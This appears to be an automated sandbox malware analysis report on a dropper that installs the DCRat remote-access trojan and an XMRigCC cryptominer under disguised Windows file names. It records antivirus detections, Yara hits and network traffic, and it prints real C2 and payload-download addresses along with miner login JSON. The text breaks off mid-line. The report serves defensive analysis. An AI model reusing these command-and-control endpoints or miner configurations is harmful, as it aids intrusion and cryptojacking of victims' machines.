                                  Source: C:\Users\user\Desktop\KbrUPpvT.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeAvira: detection malicious, Label: TR/ClipBanker.zcrtc
                                  Source: C:\Users\user\AppData\Local\Temp\EekRrdxVrk.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\Desktop\OShKWlwM.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                                  Source: C:\Users\user\Desktop\IIxTfkxV.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\Desktop\DmmmRJbk.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\Users\user\Desktop\QLwtIihK.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: 00000041.00000002.2015361827.00000000137A7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://193.32.162.64/Linelow"}
                                  Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeReversingLabs: Detection: 39%
                                  Source: C:\Users\user\Desktop\AtXEfMql.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\IIxTfkxV.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\OIKLmzcP.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\QLwtIihK.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\brrRNKBn.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\fZypqYbb.logReversingLabs: Detection: 20%
                                  Source: C:\Users\user\Desktop\mFfXERcN.logReversingLabs: Detection: 29%
                                  Source: C:\Users\user\Desktop\quigFLkP.logReversingLabs: Detection: 20%
                                  Source: C:\Users\user\Desktop\sPPOvTaE.logReversingLabs: Detection: 29%
                                  Source: C:\Users\user\Desktop\syIwhxhC.logReversingLabs: Detection: 20%
                                  Source: C:\Users\user\Desktop\tvjECxvw.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\vrXfSuSA.logReversingLabs: Detection: 15%
                                  Source: C:\Windows\Bridgeprovider.exeReversingLabs: Detection: 63%
                                  Source: C:\Windows\INF\MicrosoftDefenger.exeReversingLabs: Detection: 63%
                                  Source: C:\Windows\Tasks\1.exeReversingLabs: Detection: 63%
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeReversingLabs: Detection: 62%
                                  Source: C:\Windows\Tasks\IntelConfigService.exeReversingLabs: Detection: 56%
                                  Source: C:\Windows\Tasks\MSTask.exeReversingLabs: Detection: 54%
                                  Source: C:\Windows\Tasks\MicrosoftPrt.exeReversingLabs: Detection: 39%
                                  Source: C:\Windows\Tasks\Superfetch.exeReversingLabs: Detection: 67%
                                  Source: C:\Windows\Tasks\Wmiic.exeReversingLabs: Detection: 73%
                                  Source: C:\Windows\Tasks\Wrap.exeReversingLabs: Detection: 65%
                                  Source: IYXE4Uz61k.exeReversingLabs: Detection: 34%
                                  Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                  Source: C:\Users\user\Desktop\IZEltFrY.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\UtDRkwHy.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\KbrUPpvT.logJoe Sandbox ML: detected
                                  Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\OShKWlwM.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\DmmmRJbk.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\Aepdvrho.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\QLwtIihK.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\fZypqYbb.logJoe Sandbox ML: detected

                                  Bitcoin Miner

                                  Source: Yara matchFile source: dump.pcap, type: PCAP
                                  Source: Yara matchFile source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000035.00000003.1908378022.0000020033251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4148260496.00000200332C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000003.2249324527.000002003380A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000003.2249769366.00000200332C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4148260496.0000020033227000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4149570382.0000020033819000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4148260496.0000020033241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000003.2249324527.0000020033819000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4148260496.00000200331F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000003.1908406838.0000020033254000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: ApplicationsFrameHost.exe PID: 2044, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Tasks\config.json, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPED
                                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 185.17.0.139:81 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"your_wallet_address","pass":"x","agent":"xmrigcc/3.4.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","rx/yada","rx/lozz","rx/xdag","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider","ghostrider/mike"],"supports":["signing"]}}.
                                  Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: stratum+tcp://
                                  Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: cryptonight/0
                                  Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: stratum+tcp://
                                  Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                                  Source: IYXE4Uz61k.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: IYXE4Uz61k.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: IYXE4Uz61k.exe
                                  Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_queue.pdb source: MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: vcruntime140.amd64.pdbGCTL source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_ssl.pdb source: _ssl.pyd.56.dr
                                  Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\python3.pdb source: MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.pdb source: Bridgeprovider.exe, 00000041.00000002.2009860535.0000000003C3B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: MSTask.exe, 0000003E.00000002.4153223643.00007FFDFB243000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: MSTask.exe, 0000003E.00000002.4153223643.00007FFDFB243000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: MSTask.exe, 00000038.00000003.1927960487.00000286A4ACD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: kockv.pdb source: Bridgeprovider.exe, 00000041.00000002.2037973989.000000001BD19000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: vcruntime140.amd64.pdb source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmp

                                  Spreading

                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0087A69B
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0088C220
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0011A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,26_2_0011A69B
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,26_2_0012C220
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0C9E0 FindFirstFileExW,42_2_00007FF726D0C9E0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA8110 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,56_2_00007FF7B1DA8110
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1D97B80 FindFirstFileExW,FindClose,56_2_00007FF7B1D97B80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA8110 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,56_2_00007FF7B1DA8110
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB20D4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,56_2_00007FF7B1DB20D4
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,60_2_003EA69B
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,60_2_003FC220
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004462 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,62_2_00007FFDFB004462
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 4x nop then jmp 00007FFD9B002136h65_2_00007FFD9AFF087A
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh65_2_00007FFD9B19D5CD

                                  Networking

                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49741 -> 193.32.162.64:80
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49739
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49740
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49742
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49744
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49752
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49773
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49795
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49820
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49842
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49863
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49888
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49909
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49930
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49951
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49972
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49999
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50021
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50028
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50030
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50033
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50035
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50038
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50040
                                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 185.17.0.139:81
                                  Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.64.40
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.17.0.139
                                  Source: global trafficHTTP traffic detected: GET /miners/v.txt HTTP/1.1Host: 45.137.64.40User-Agent: python-requests/2.28.1Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
                                  Source: unknownHTTP traffic detected: POST /client/setClientConfig?clientId=124406 HTTP/1.1Accept: *//*Accept: application/jsonAuthorization: Bearer mySecretConnection: closeContent-Length: 3462Content-Type: application/jsonHost: 185.17.0.139:8081User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                  Source: MSTask.exe, 0000003E.00000002.4151834766.00000268D2050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                                  Source: MSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/miners.txt
                                  Source: MSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/miners.txtindex
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/miners.txtz
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4152250837.00000268D2590000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149243495.00000268D17A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/v.txt
                                  Source: MSTask.exe, 0000003E.00000002.4149243495.00000268D17A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.137.64.40/miners/v.txt_inspect.py?
                                  Source: MSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org/techtonik/python-pager
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1D2A000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org/techtonik/python-wget/
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 